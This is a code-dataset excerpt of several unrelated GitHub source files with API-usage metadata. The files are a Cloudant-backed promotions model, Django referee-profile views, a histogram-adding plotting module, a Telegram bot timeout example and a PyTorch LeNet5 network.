{"api_name": "gi.repository.Gtk.Align", "line_number": 115, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 118, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 118, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 122, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 122, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 122, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 125, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 125, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 129, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 129, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ShadowType", "line_number": 131, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 131, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_file", "line_number": 132, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 132, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 132, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 138, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 138, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 141, "usage_type": "name"}, {"api_name": 
"gi.repository.Gtk.Table", "line_number": 152, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 152, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 168, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 168, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 168, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.ComboBoxText", "line_number": 177, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 177, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 185, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 185, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 185, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 189, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 189, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 199, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 199, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 199, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.ComboBoxText", "line_number": 210, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 210, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 223, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 223, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 223, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 227, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 227, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 235, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 235, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 235, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 239, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 239, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 244, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 244, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 249, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 249, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 256, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 256, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 256, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 260, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 260, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 265, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 265, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 269, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 269, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 276, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 276, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Align", "line_number": 276, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.ListStore", 
"line_number": 279, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 279, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ComboBox.new_with_model_and_entry", "line_number": 284, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.ComboBox", "line_number": 284, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 284, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 302, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 302, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ShadowType", "line_number": 304, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 304, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.TextBuffer", "line_number": 305, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 305, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.TextView", "line_number": 306, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 306, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.WrapMode", "line_number": 307, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 307, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 316, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 316, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 338, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 338, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 339, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 339, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 340, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 340, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 354, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 390, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 398, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 398, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 401, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 432, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 432, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 435, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 456, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 456, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.main", "line_number": 458, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 458, "usage_type": "name"}]} +{"seq_id": "41109370414", "text": "# _\n# _ooOoo_\n# o8888888o\n# 88\" . \"88\n# (| -_- |)\n# O\\ = /O\n# ____/`---'\\____\n# .' \\\\| |// `.\n# / \\\\||| : |||// \\\n# / _||||| -:- |||||_ \\\n# | | \\\\\\ - /'| | |\n# | \\_| `\\`---'// |_/ |\n# \\ .-\\__ `-. -'__/-. /\n# ___`. .' /--.--\\ `. .'___\n# .\"\" '< `.___\\_<|>_/___.' _> \\\"\".\n# | | : `- \\`. ;`. _/; .'/ / .' ; |\n# \\ \\ `-. \\_\\_`. _.'_/_/ -' _.' 
/\n# ===========`-.`___`-.__\\ \\___ /__.-'_.'_.-'================\n# `=--=-' BUG FREE\n\"\"\"\nAll models should be defined here\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport json\nimport logging\nfrom cloudant.client import Cloudant\nfrom cloudant.query import Query\nfrom requests import HTTPError, ConnectionError\nfrom cloudant.adapters import Replay429Adapter\n\n# get configuration from environment (12-factor)\nADMIN_PARTY = os.environ.get('ADMIN_PARTY', 'False').lower() == 'true'\nCLOUDANT_HOST = os.environ.get('CLOUDANT_HOST', 'localhost')\nCLOUDANT_USERNAME = os.environ.get('CLOUDANT_USERNAME', 'admin')\nCLOUDANT_PASSWORD = os.environ.get('CLOUDANT_PASSWORD', 'pass')\n\n\nclass DatabaseConnectionError(Exception):\n    \"\"\" Custom Exception when database connection fails \"\"\"\n\n\nclass DataValidationError(Exception):\n    \"\"\" Used for data validation errors when deserializing \"\"\"\n\n\nclass Promotion():\n    \"\"\"\n    Class that represents a Promotion\n\n    This version uses a NoSQL database CouchDB for persistence\n    which is hidden from us by the Cloudant library\n    \"\"\"\n    logger = logging.getLogger('flask.app')\n    client = None   # cloudant.client.Cloudant\n    database = None  # cloudant.database.CloudantDatabase\n\n    def __init__(self, code=None, products=None,\n                 percentage=None, expiry_date=None, start_date=None):\n        \"\"\" Constructor \"\"\"\n        self.id = None\n        self.code = code\n        self.products = products\n        self.percentage = percentage\n        self.expiry_date = expiry_date\n        self.start_date = start_date\n\n    def create(self):\n        \"\"\"\n        Creates a new Promotion in the database\n        \"\"\"\n        self.validate()\n\n        try:\n            document = self.database.create_document(self.serialize())\n        except HTTPError as err:\n            Promotion.logger.warning('Create failed: %s', err)\n            return\n\n        if document.exists():\n            self.id = document['_id']\n\n    def update(self):\n        \"\"\" Updates a Promotion in the database \"\"\"\n        self.validate()\n\n        if self.id:\n            try:\n                document = self.database[self.id]\n            except KeyError:\n                document = None\n            if document:\n                document.update(self.serialize())\n                document.save()\n\n    def save(self):\n        \"\"\" Saves a Promotion in the database \"\"\"\n        if self.id:\n            self.update()\n        else:\n            self.create()\n\n    def delete(self):\n        \"\"\" Deletes a Promotion from the database \"\"\"\n        if self.id:\n            try:\n                document = self.database[self.id]\n            except KeyError:\n                document = None\n            if document:\n                document.delete()\n\n    def validate(self):\n        \"\"\" object fields validation \"\"\"\n        if self.code is None or self.code == '':\n            raise DataValidationError('code attribute is not set')\n        if self.products is None:\n            raise DataValidationError('products attribute is not set')\n        if self.percentage is None:\n            raise DataValidationError('percentage attribute is not set')\n        if self.expiry_date is None:\n            raise DataValidationError('expiry_date attribute is not set')\n        if self.start_date is None:\n            raise DataValidationError('start_date attribute is not set')\n        if self.start_date > self.expiry_date:\n            raise DataValidationError('start date should not be later than expiry date')\n        if self.percentage < 0 or self.percentage > 100:\n            raise DataValidationError(\n                'Percentage should be in the range of 0 to 100')\n\n        # Check if this promotion conflicts with any existing promotions\n        promotions = Promotion.find_by_code(self.code)\n        for promotion in promotions:\n            if self.id is not None and self.id == promotion.id:\n                continue\n\n            if (promotion.start_date <= self.start_date and self.start_date <= promotion.expiry_date) or \\\n                 
(promotion.start_date <= self.expiry_date and self.expiry_date <= promotion.expiry_date):\n                raise DataValidationError('This new/updated promotion conflicts with promotion({})'.format(promotion.id))\n\n    def serialize(self):\n        \"\"\" Serializes a Promotion into a dictionary \"\"\"\n        return {\n            \"id\": self.id,\n            \"code\": self.code,\n            \"products\": self.products,\n            \"percentage\": self.percentage,\n            \"expiry_date\": self.expiry_date,\n            \"start_date\": self.start_date,\n        }\n\n    def deserialize(self, data):\n        \"\"\"\n        Deserializes a Promotion from a dictionary\n\n        Args:\n            data (dict): A dictionary containing the Promotion data\n        \"\"\"\n        try:\n            self.code = data['code']\n            self.percentage = int(data['percentage'])\n            self.expiry_date = int(data['expiry_date'])\n            self.start_date = int(data['start_date'])\n            self.products = data['products']\n        except KeyError as error:\n            raise DataValidationError(\n                'Invalid promotion: missing ' + error.args[0])\n        except ValueError as error:\n            raise DataValidationError(\n                'Invalid promotion value: ' + error.args[0])\n\n        # if there is no id and the data has one, assign it\n        if not self.id and '_id' in data:\n            self.id = data['_id']\n\n        return self\n    \n    def is_active(self):\n        \"\"\"\n        A promotion is active if the current timestamp is in its range [start_date, expiry_date]\n        \"\"\"\n        now_ts = time.time()\n        return self.start_date <= now_ts and now_ts <= self.expiry_date\n\n######################################################################\n#  S T A T I C   D A T A B A S E   M E T H O D S\n######################################################################\n    @classmethod\n    def connect(cls):\n        \"\"\" Connect to the server \"\"\"\n        cls.client.connect()\n\n    @classmethod\n    def disconnect(cls):\n        \"\"\" Disconnect from the server \"\"\"\n        cls.client.disconnect()\n\n    @classmethod\n    def remove_all(cls):\n        \"\"\" Removes all documents from the database (use for testing) \"\"\"\n        for document in cls.database:\n            document.delete()\n\n    @classmethod\n    def all(cls):\n        \"\"\" Query that returns all Promotions \"\"\"\n        results = []\n        for doc in cls.database:\n            promotion = Promotion().deserialize(doc)\n            promotion.id = doc['_id']\n            results.append(promotion)\n        return results\n\n######################################################################\n#  F I N D E R   M E T H O D S\n######################################################################\n    @classmethod\n    def find_by(cls, **kwargs):\n        \"\"\" Find records using selector \"\"\"\n        query = Query(cls.database, selector=kwargs)\n        results = []\n        for doc in query.result:\n            promotion = Promotion()\n            promotion.deserialize(doc)\n            results.append(promotion)\n        return results\n\n    @classmethod\n    def find(cls, promotion_id):\n        \"\"\" Query that finds Promotions by their id \"\"\"\n        try:\n            document = cls.database[promotion_id]\n        except KeyError:\n            return None\n        if '_rev' in document:\n            return Promotion().deserialize(document)\n        return None\n\n    @classmethod\n    def find_by_code(cls, code):\n        \"\"\" Query that finds Promotions by their code \"\"\"\n        return cls.find_by(code=code)\n\n############################################################\n#  C L O U D A N T   D A T A B A S E   C O N N E C T I O N\n############################################################\n    @staticmethod\n    def init_db(dbname='promotions'):\n        \"\"\"\n        Initialize the Cloudant database connection\n        \"\"\"\n        opts = {}\n        vcap_services = {}\n        # Try and get VCAP from the environment or a file if developing\n        if 'VCAP_SERVICES' in os.environ:\n            Promotion.logger.info('Running in Bluemix mode.')\n            vcap_services = 
json.loads(os.environ['VCAP_SERVICES'])\n # if VCAP_SERVICES isn't found, maybe we are running on Kubernetes?\n elif 'BINDING_CLOUDANT' in os.environ:\n Promotion.logger.info('Found Kubernetes Bindings')\n creds = json.loads(os.environ['BINDING_CLOUDANT'])\n vcap_services = {\"cloudantNoSQLDB\": [{\"credentials\": creds}]}\n else:\n Promotion.logger.info(\n 'VCAP_SERVICES and BINDING_CLOUDANT undefined.')\n creds = {\n \"username\": CLOUDANT_USERNAME,\n \"password\": CLOUDANT_PASSWORD,\n \"host\": CLOUDANT_HOST,\n \"port\": 5984,\n \"url\": \"http://\"+CLOUDANT_HOST+\":5984/\"\n }\n vcap_services = {\"cloudantNoSQLDB\": [{\"credentials\": creds}]}\n\n # Look for Cloudant in VCAP_SERVICES\n for service in vcap_services:\n if service.startswith('cloudantNoSQLDB'):\n cloudant_service = vcap_services[service][0]\n opts['username'] = cloudant_service['credentials']['username']\n opts['password'] = cloudant_service['credentials']['password']\n opts['host'] = cloudant_service['credentials']['host']\n opts['port'] = cloudant_service['credentials']['port']\n opts['url'] = cloudant_service['credentials']['url']\n\n if any(k not in opts for k in ('host', 'username', 'password', 'port', 'url')):\n raise DatabaseConnectionError('Error - Failed to retrieve options. '\n 'Check that app is bound to a Cloudant service.')\n\n Promotion.logger.info('Cloudant Endpoint: %s', opts['url'])\n try:\n if ADMIN_PARTY:\n Promotion.logger.info('Running in Admin Party Mode...')\n Promotion.client = Cloudant(opts['username'],\n opts['password'],\n url=opts['url'],\n connect=True,\n auto_renew=True,\n admin_party=ADMIN_PARTY,\n adapter=Replay429Adapter(\n retries=10, initialBackoff=0.1)\n )\n except ConnectionError:\n raise DatabaseConnectionError(\n 'Cloudant service could not be reached')\n\n # Create database if it doesn't exist\n try:\n Promotion.database = Promotion.client[dbname]\n except KeyError:\n # Create a database using an initialized client\n Promotion.database = Promotion.client.create_database(dbname)\n # check for success\n if not Promotion.database.exists():\n raise DatabaseConnectionError(\n 'Database [{}] could not be obtained'.format(dbname))\n", "repo_name": "devops-fall-2019-promotions-squad/promotions", "sub_path": "service/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 11854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.environ.get", "line_number": 35, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 38, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 78, "usage_type": "name"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "cloudant.query.Query", "line_number": 222, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 257, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 259, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 259, "usage_type": 
"attribute"}, {"api_name": "os.environ", "line_number": 261, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 263, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 263, "usage_type": "attribute"}, {"api_name": "cloudant.client.Cloudant", "line_number": 295, "usage_type": "call"}, {"api_name": "cloudant.adapters.Replay429Adapter", "line_number": 301, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 304, "usage_type": "name"}]} +{"seq_id": "19043265501", "text": "from django.shortcuts import render, redirect\n\nfrom .form_profile import RefereeForm\nfrom .models_profile import Referee\nfrom .views import loginA\n\n\ndef referee(request):\n if request.user.is_authenticated:\n return render(request, 'profile/input_referee.html')\n else:\n return loginA(request)\n\n\ndef create(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = RefereeForm(request.POST)\n print(form)\n if form.is_valid():\n referees = form.save(commit=False)\n referees.image = request.FILES['image']\n referees.save()\n return render(request, 'profile/input_referee.html', {'form': form})\n else:\n form = RefereeForm()\n return render(request, 'app/base.html', {'form': form})\n\n\ndef list(request):\n if request.user.is_authenticated:\n if request.method == 'POST' and 'delete_id' in request.POST:\n delete_id = request.POST.getlist('delete_id')\n\n try:\n referees = Referee.objects.filter(id__in=delete_id)\n referees.delete()\n except Referee.DoesNotExist:\n pass\n\n if request.method == 'POST' and 'edit_id' in request.POST:\n edit_id = request.POST['edit_id']\n try:\n referees = Referee.objects.get(id=edit_id)\n return render(request, 'profile/update_referee.html', {'referees': referees,\n \"id\": edit_id})\n\n except Referee.DoesNotExist:\n pass\n\n referees = Referee.objects.all()\n\n return render(request, 'profile/tables_referee.html', {'referees': referees})\n\n return render(request, 'profile/tables_referee.html', {'referees': None})\n\n\ndef update(request, id):\n if request.method == 'POST':\n fullname = request.POST.get('fullname')\n object = request.POST.get('object')\n image = request.POST.get('image')\n sex = request.POST.get('sex')\n social_network = request.POST.get('social_network')\n date_of_birth = request.POST.get('date_of_birth')\n achier = request.POST.get('achier')\n home_live = request.POST.get('home_live')\n career = request.POST.get('career')\n referees = Referee(\n id=id,\n fullname=fullname,\n object=object,\n image=image,\n sex=sex,\n social_network=social_network,\n date_of_birth=date_of_birth,\n achier=achier,\n home_live=home_live,\n career=career,\n )\n referees.image = request.FILES['image']\n referees.save()\n return redirect('list_referee')\n return render(request, 'app/base.html')\n\n\n", "repo_name": "Duongguyen/django_server", "sub_path": "app/views_referee.py", "file_name": "views_referee.py", "file_ext": "py", "file_size_in_byte": 2832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "views.loginA", "line_number": 12, "usage_type": "call"}, {"api_name": "form_profile.RefereeForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "form_profile.RefereeForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", 
"line_number": 27, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 36, "usage_type": "name"}, {"api_name": "models_profile.Referee.DoesNotExist", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 38, "usage_type": "name"}, {"api_name": "models_profile.Referee.objects.get", "line_number": 44, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "models_profile.Referee.DoesNotExist", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 48, "usage_type": "name"}, {"api_name": "models_profile.Referee.objects.all", "line_number": 51, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 51, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "models_profile.Referee", "line_number": 69, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "32392659439", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nimport Artus.Utility.logger as logger\nlog = logging.getLogger(__name__)\n\nimport sys\n\nimport Artus.HarryPlotter.analysisbase as analysisbase\nimport Artus.HarryPlotter.utility.roottools as roottools\n\n\nclass AddHistograms(analysisbase.AnalysisBase):\n\t\"\"\"Create sum of histograms. 
This module does exactly the same as SumOfHistograms, but it allows several addition steps to be chained together.\"\"\"\n\n\tdef modify_argument_parser(self, parser, args):\n\t\tsuper(AddHistograms, self).modify_argument_parser(parser, args)\n\n\t\tself.add_histograms_options = parser.add_argument_group(\"{} options\".format(self.name()))\n\t\tself.add_histograms_options.add_argument(\n\t\t\t\t\"--add-nicks\", nargs=\"+\",\n\t\t\t\thelp=\"Nick names (whitespace separated) for the histograms to be added\"\n\t\t)\n\t\tself.add_histograms_options.add_argument(\n\t\t\t\t\"--add-scale-factors\", nargs=\"+\",\n\t\t\t\thelp=\"Scale factor (whitespace separated) for the histograms to be added [Default: 1].\"\n\t\t)\n\t\tself.add_histograms_options.add_argument(\n\t\t\t\t\"--add-result-nicks\", nargs=\"+\",\n\t\t\t\thelp=\"Nick names for the resulting sum histograms.\"\n\t\t)\n\n\tdef prepare_args(self, parser, plotData):\n\t\tsuper(AddHistograms, self).prepare_args(parser, plotData)\n\t\tself.prepare_list_args(plotData, [\"add_nicks\", \"add_result_nicks\", \"add_scale_factors\"])\n\t\t\n\t\tfor index, (add_nicks, add_result_nick, add_scale_factors) in enumerate(zip(\n\t\t\t\t*[plotData.plotdict[k] for k in [\"add_nicks\", \"add_result_nicks\", \"add_scale_factors\"]]\n\t\t)):\n\t\t\tplotData.plotdict[\"add_nicks\"][index] = add_nicks.split()\n\t\t\tnot_found_inputs = list(set(plotData.plotdict[\"add_nicks\"][index]) - set(plotData.plotdict[\"nicks\"]))\n\t\t\tif len(not_found_inputs) > 0:\n\t\t\t\tlog.critical(\"--add-nicks \\\"\" + (\"\\\", \\\"\".join(not_found_inputs)) + \"\\\" not found in list of --nicks \\\"\" + (\"\\\", \\\"\".join(plotData.plotdict[\"nicks\"])) + \"\\\"!\")\n\t\t\t\tsys.exit(1)\n\t\t\tif add_scale_factors is None:\n\t\t\t\tplotData.plotdict[\"add_scale_factors\"][index] = [1] * len(add_nicks.split())\n\t\t\telse:\n\t\t\t\tplotData.plotdict[\"add_scale_factors\"][index] = [float(add_scale_factor) for add_scale_factor in add_scale_factors.split()]\n\t\t\tif add_result_nick is None:\n\t\t\t\tplotData.plotdict[\"add_result_nicks\"][index] = \"add_{}\".format(\n\t\t\t\t\t\t\"_\".join(plotData.plotdict[\"add_nicks\"][index]),\n\t\t\t\t)\n\t\t\tif not plotData.plotdict[\"add_result_nicks\"][index] in plotData.plotdict[\"nicks\"]:\n\t\t\t\tplotData.plotdict[\"nicks\"].insert(\n\t\t\t\t\t\tplotData.plotdict[\"nicks\"].index(plotData.plotdict[\"add_nicks\"][index][0]),\n\t\t\t\t\t\tplotData.plotdict[\"add_result_nicks\"][index]\n\t\t\t\t)\n\n\tdef run(self, plotData=None):\n\t\tsuper(AddHistograms, self).run(plotData)\n\t\t\n\t\tfor add_nicks, add_scale_factors, add_result_nick in zip(\n\t\t\t\t*[plotData.plotdict[k] for k in [\"add_nicks\", \"add_scale_factors\", \"add_result_nicks\"]]\n\t\t):\n\t\t\t\n\t\t\tlog.debug(\"AddHistograms: \"+add_result_nick+\" = \"+(\" + \".join([str(scale)+\"*\"+nick for nick, scale in zip(add_nicks, add_scale_factors)])))\n\t\t\tplotData.plotdict[\"root_objects\"][add_result_nick] = roottools.RootTools.add_root_histograms(\n\t\t\t\t\t*[plotData.plotdict[\"root_objects\"][nick] for nick in add_nicks],\n\t\t\t\t\tscale_factors=add_scale_factors\n\t\t\t)\n\n", "repo_name": "artus-analysis/Artus", "sub_path": "HarryPlotter/python/analysis_modules/addhistograms.py", "file_name": "addhistograms.py", "file_ext": "py", "file_size_in_byte": 3148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": 
"Artus.HarryPlotter.analysisbase.AnalysisBase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "Artus.HarryPlotter.analysisbase", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "Artus.HarryPlotter.utility.roottools.RootTools.add_root_histograms", "line_number": 67, "usage_type": "call"}, {"api_name": "Artus.HarryPlotter.utility.roottools.RootTools", "line_number": 67, "usage_type": "attribute"}, {"api_name": "Artus.HarryPlotter.utility.roottools", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "26136198379", "text": "import asyncio\nfrom telebot import async_telebot, types\nfrom telemod import Listener, TimeOut\n\nbot = async_telebot.AsyncTeleBot(token=\"\")\nloop = asyncio.get_event_loop()\n\nlistener = Listener(bot=bot, loop=loop)\n\n@bot.message_handler(commands=[\"start\"])\nasync def start_handler(message: types.Message):\n try:\n msg = await listener.listen_to(message, \"What's your name?\", timeout=10)\n except TimeOut:\n msg = None\n await bot.reply_to(message, \"Time Out\")\n if msg:\n return await bot.reply_to(msg, f\"Hi {msg.text}\")\n\nasync def main():\n print((await bot.get_me()).first_name)\n # await listener.start()\n await bot.infinity_polling(skip_pending=True)\n\nloop.run_until_complete(main())\n", "repo_name": "x72x/tele-mod", "sub_path": "examples/timeout_example.py", "file_name": "timeout_example.py", "file_ext": "py", "file_size_in_byte": 722, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "telebot.async_telebot.AsyncTeleBot", "line_number": 5, "usage_type": "call"}, {"api_name": "telebot.async_telebot", "line_number": 5, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 6, "usage_type": "call"}, {"api_name": "telemod.Listener", "line_number": 8, "usage_type": "call"}, {"api_name": "telebot.types.Message", "line_number": 11, "usage_type": "attribute"}, {"api_name": "telebot.types", "line_number": 11, "usage_type": "name"}, {"api_name": "telemod.TimeOut", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "21197011314", "text": "import torch \nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn as nn\nimport torchvision.transforms as transforms\n\n\n#Defining the convolutional neural network\nclass LeNet5(nn.Module):\n def __init__(self, num_classes):\n super().__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.fc = nn.Linear(400, 120)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(84, num_classes)\n \n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n return out\n\nif __name__ == '__main__':\n print('shouldnt do anything')\n\n\n\n\t ", "repo_name": "sela847/SignAlert", "sub_path": "python/Shaaran/PyQtGUI/LeNetModel.py", "file_name": "LeNetModel.py", "file_ext": "py", "file_size_in_byte": 1236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": 
